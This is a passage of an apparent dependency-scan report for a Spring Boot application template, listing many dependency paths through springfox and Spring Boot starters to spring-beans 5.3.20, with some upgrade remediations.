  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
